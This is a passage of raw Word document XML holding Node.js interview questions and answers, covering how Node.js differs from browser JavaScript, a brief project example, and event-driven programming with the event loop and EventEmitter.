      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A50075"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19" w:name="_Toc178383202"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q19. What is the difference between Node.js and browser JavaScript?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="43C447BC" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js and browser JavaScript both use the JavaScript language, but they are designed for different environments and have distinct features, capabilities, and use cases. Here’s a comparison of the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C00E344"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1. Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B9E17" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>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Runs on the server-side and allows JavaScript to interact with the file system, databases, networks, and other backend resources. It is built on the V8 engine (Google's high-performance JavaScript engine) and is used for building scalable server-side applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CB1E6" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>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 Runs in the client-side (web browser) and is primarily used to interact with the DOM (Document Object Model), handle events, manipulate HTML/CSS, and manage client-side data (like cookies or localStorage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67917A5A"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2. APIs and Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FB891" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2885C5" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Provides modules and APIs for server-side operations like fs (file system), http (creating HTTP servers), net (networking), path, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A08A0B" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uses the CommonJS module system (require) to load modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC99AB" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access to global object, which provides global variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75000E82" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3985D1" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Provides APIs for interacting with the DOM, making HTTP requests (via fetch or XMLHttpRequest), handling user input, and manipulating HTML/CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF6EAE" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uses ES6 module system (import/export) natively or older methods like &lt;script&gt; tags for including JavaScript files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5D52F" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access to window object, which represents the browser window and provides global variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D607351"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3. Global Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834E563" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>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The global object is global. For example, global.setTimeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050BD4B" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>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 The global object is window. For example, window.setTimeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A8DD0"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4. File System Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F1470" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>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Full access to the file system via the fs module, allowing you to read, write, and manipulate files on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE00F84" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>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 No direct access to the file system for security reasons. Interaction with files is limited to user-selected files (via file inputs) and storage APIs like localStorage or IndexedDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFF421"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5. Asynchronous Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0539CD" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses asynchronous programming extensively with callbacks, Promises, and async/await. Node.js is non-blocking and event-driven, making it suitable for handling I/O operations efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658766EE" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>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 Also supports asynchronous programming through Promises and async/await, particularly for tasks like making HTTP requests, but it’s often used for handling events like user interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684A329"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6. Security Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974288B" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>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Runs with full access to the system, which requires careful security practices (e.g., validating input, sanitizing data) to avoid vulnerabilities like file system access or code injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784455BA" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>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 Runs in a sandboxed environment to protect the user and the system from malicious scripts. This includes restrictions on cross-origin requests (CORS) and access to the local file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099BCE0"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7. Event Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EFC467" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>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The event loop handles all asynchronous operations, making Node.js highly efficient for I/O-bound tasks. It uses the same event loop mechanism as browsers but is optimized for server-side tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E73F8" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>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 The event loop handles UI rendering, user interactions, and async operations (like network requests), prioritizing responsiveness and user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C3AEB0"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8. Package Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F115541" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>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Uses npm (Node Package Manager) to manage and install third-party packages, with a vast repository of modules available for different tasks (e.g., Express, Lodash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270064BF" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>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 Historically relied on script tags and CDNs to include libraries, but now also supports npm, with tools like Webpack or Parcel for bundling and managing dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525CDD3"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9. Concurrency Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655FAB6" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>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Uses a single-threaded, non-blocking I/O model with an event loop. It can handle many concurrent operations efficiently without blocking the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FD08A" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>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 Uses a single-threaded event loop for UI updates and asynchronous tasks. Web Workers can be used for multi-threading, but these run in isolated threads with limited interaction with the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01700F5C"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10. Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309EC00" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>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Used for server-side applications, RESTful APIs, microservices, real-time applications (like chat), command-line tools, and other backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFA2F3" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used for creating interactive and dynamic web pages, handling user input, updating the DOM, making AJAX requests, and working with front-end frameworks like React, Angular, or Vue.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EC780" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050F6CFD" w14:textId="0AEEC329" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc178383203"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q20. Can you give an example of a Node.js project you have worked on?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidR="005D3C11" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B39DD" w14:textId="22076077" w:rsidR="005D3C11" w:rsidRPr="00DA2F32" w:rsidRDefault="005D3C11" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inventory mgmt. system for a small finance bank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06451000" w14:textId="6A1983CB" w:rsidR="002C08DE" w:rsidRDefault="005D3C11" w:rsidP="002C08DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File server, Authentication, QR Code, Location services, SIP Call setup – invite, register</w:t>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Toc178383204"/>
    </w:p>
    <w:p w14:paraId="59AA1A3E" w14:textId="6CEE1FC1" w:rsidR="00E40D14" w:rsidRPr="00E732E8" w:rsidRDefault="00E40D14" w:rsidP="002C08DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="616161"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E732E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>intermediate, mid-level developers:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="6DBD9131"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22" w:name="_Toc178383205"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q21. What is Node.js, and how is it different from other server-side technologies?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1C77E862"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23" w:name="_Toc178383206"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q22. Explain the concept of event-driven programming in Node.js.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="259750FE" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event-driven programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a key paradigm in Node.js that makes it efficient and scalable, especially for I/O-bound applications. In an event-driven architecture, the flow of the program is determined by events such as user actions, messages from other programs, or hardware signals. In Node.js, events are central to how it operates, allowing it to handle multiple operations concurrently without blocking the execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390AF5EB"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Key Concepts of Event-Driven Programming in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74890372" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47562CC4" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop is the heart of Node.js. It continuously checks the event queue and processes tasks, such as I/O operations, timers, and event callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50003AE3" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is single-threaded but uses the event loop to handle asynchronous operations. When an operation completes, it triggers an event, and the corresponding callback is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFEE95" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EventEmitter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D094FC" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The EventEmitter class in Node.js is used to create and handle events. An instance of EventEmitter can emit named events and register listeners (callbacks) to respond when those events are emitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF04CA1" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
